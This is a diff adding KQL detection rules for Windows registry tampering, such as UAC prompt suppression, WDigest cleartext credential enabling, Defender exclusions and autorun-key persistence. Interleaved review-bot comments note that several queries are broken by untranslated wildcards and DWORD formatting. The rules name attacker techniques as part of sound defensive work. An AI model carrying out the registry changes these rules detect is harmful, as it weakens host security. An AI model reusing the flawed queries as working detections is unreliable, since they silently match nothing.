+// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
+// When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql
new file mode 100644
index 00000000..5c2b5725
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql
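Review bot: The data test `RegistryValueData =~ "DWORD (0x00000001)"` will only match if this table renders DWORDs the way Sysmon does; my understanding is that DeviceRegistryEvents gives `"1"` and puts the type in `RegistryValueType`, in which case this rule is silent. Suggest `RegistryValueData in~ ("1", "DWORD (0x00000001)")` and confirm whether `UACDisableNotify` is in `RegistryKey` or `RegistryValueName` before shipping.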
@@ -0,0 +1,12 @@
+// Title: UAC Secure Desktop Prompt Disabled
+// Author: frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
+// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
+// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
new file mode 100644
index 00000000..689ef8d5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Extension In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql
new file mode 100644
index 00000000..5e7459d2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql
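Review bot: `RegistryKey endswith "\\Control\\Keyboard Layouts*"` treats the `*` as a literal character, since KQL `endswith` and `=~` have no glob support, so the Sigma wildcard survived conversion and this clause can only match a key that really ends in an asterisk. The intended meaning is a path prefix, which in KQL is `RegistryKey contains "\\Control\\Keyboard Layouts\\"`. The same untranslated trailing `*` appears in vbscript_payload_stored_in_registry (`\\Installer\\UserData*`), wfp_filter_added_via_registry (`\\Persistent\\Filter*`), windows_event_log_access_tampering_via_registry (where `endswith "...\\EventLog*"` ANDed with `endswith "\\CustomSD"` can never both hold), winget_admin_settings_modification (`RegistryKey =~ "\\REGISTRY\\A*"`) and wow6432node_currentversion_autorun_keys_modification (`\\Run*`, `\\RunOnce*`, `\\RunOnceEx*`, `\\RunServices*`, `\\RunServicesOnce*`, `...\\Software\\Wow6432Node*`, `...\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*`), so this looks like a converter bug in how `endswith` modifiers with a trailing wildcard are emitted rather than a per-rule typo. The effect is silent: the queries parse and run but the affected branches return nothing, so a post-conversion check that rejects `*` inside `endswith`/`=~` string literals would be a cheap safeguard.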
@@ -0,0 +1,12 @@ +// Title: Uncommon Microsoft Office Trusted Location Added +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Other unknown legitimate or custom paths need to be filtered to avoid false positives + +DeviceRegistryEvents +| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql new file mode 100644 index 00000000..978606fc --- /dev/null 
+++ b/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql @@ -0,0 +1,12 @@ +// Title: Usage of Renamed Sysinternals Tools - RegistrySet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey contains "\\PsExec" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\Active Directory Explorer") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe"))) and (not(isnull(InitiatingProcessFolderPath))) \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql b/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql new file mode 100644 index 00000000..96af8950 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql @@ -0,0 +1,10 @@ +// Title: VBScript Payload Stored in Registry +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql b/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql new file mode 100644 index 00000000..50528dd1 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql 
@@ -0,0 +1,10 @@
+// Title: Wdigest Enable UseLogonCredential
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-09-12
+// Level: high
+// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql b/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql
new file mode 100644
index 00000000..c37cfb49
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: WFP Filter Added via Registry
+// Author: Frack113
+// Date: 2025-10-23
+// Level: medium
+// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql
new file mode 100644
index 00000000..c611b785
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Exclusions Added - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-07-06
+// Level: medium
+// Description: Detects the Setting of Windows Defender Exclusions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql
new file mode 100644
index 00000000..bb34d560
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Service Disabled - Registry
+// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: high
+// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql
new file mode 100644
index 00000000..51ce5ddf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql
@@ -0,0 +1,12 @@ +// Title: Windows Event Log Access Tampering Via Registry +// Author: X__Junior +// Date: 2025-01-16 +// Level: high +// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112 +// False Positives: +// - Administrative activity, still unlikely + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD") or ((RegistryKey endswith "\\Policies\\Microsoft\\Windows\\EventLog*" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryKey endswith "\\ChannelAccess")) and (RegistryValueData contains "D:(D;" or (RegistryValueData contains "D:(" and RegistryValueData contains ")(D;")) and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql new file mode 100644 index 00000000..89c77c5d --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql 
@@ -0,0 +1,14 @@
+// Title: Windows Recall Feature Enabled - Registry
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql b/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql
new file mode 100644
index 00000000..acf268fa
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql
@@ -0,0 +1,12 @@
+// Title: Winget Admin Settings Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: low
+// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey =~ "\\REGISTRY\\A*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql
new file mode 100644
index 00000000..546b5770
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql
@@ -0,0 +1,14 @@
+// Title: Winlogon AllowMultipleTSSessions Enable
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
+// Which allows for multiple Remote Desktop connection sessions to be opened at once.
+// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of the multi session functionality
+
+DeviceRegistryEvents
+| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql b/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql
new file mode 100644
index 00000000..d57db568
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql
@@ -0,0 +1,11 @@
+// Title: Winlogon Notify Key Logon Persistence
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
+// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql
new file mode 100644
index 00000000..6148dd5c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: WinSock2 Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql
new file mode 100644
index 00000000..45ea6561
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql
@@ -0,0 +1,13 @@ +// Title: Wow6432Node Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..fc54df88 --- /dev/null 
+++ b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: Wow6432Node CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or isnull(RegistryValueData) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper 
Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) 
or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..6472a03f --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@
+// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or RegistryValueData endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
+++ /dev/null
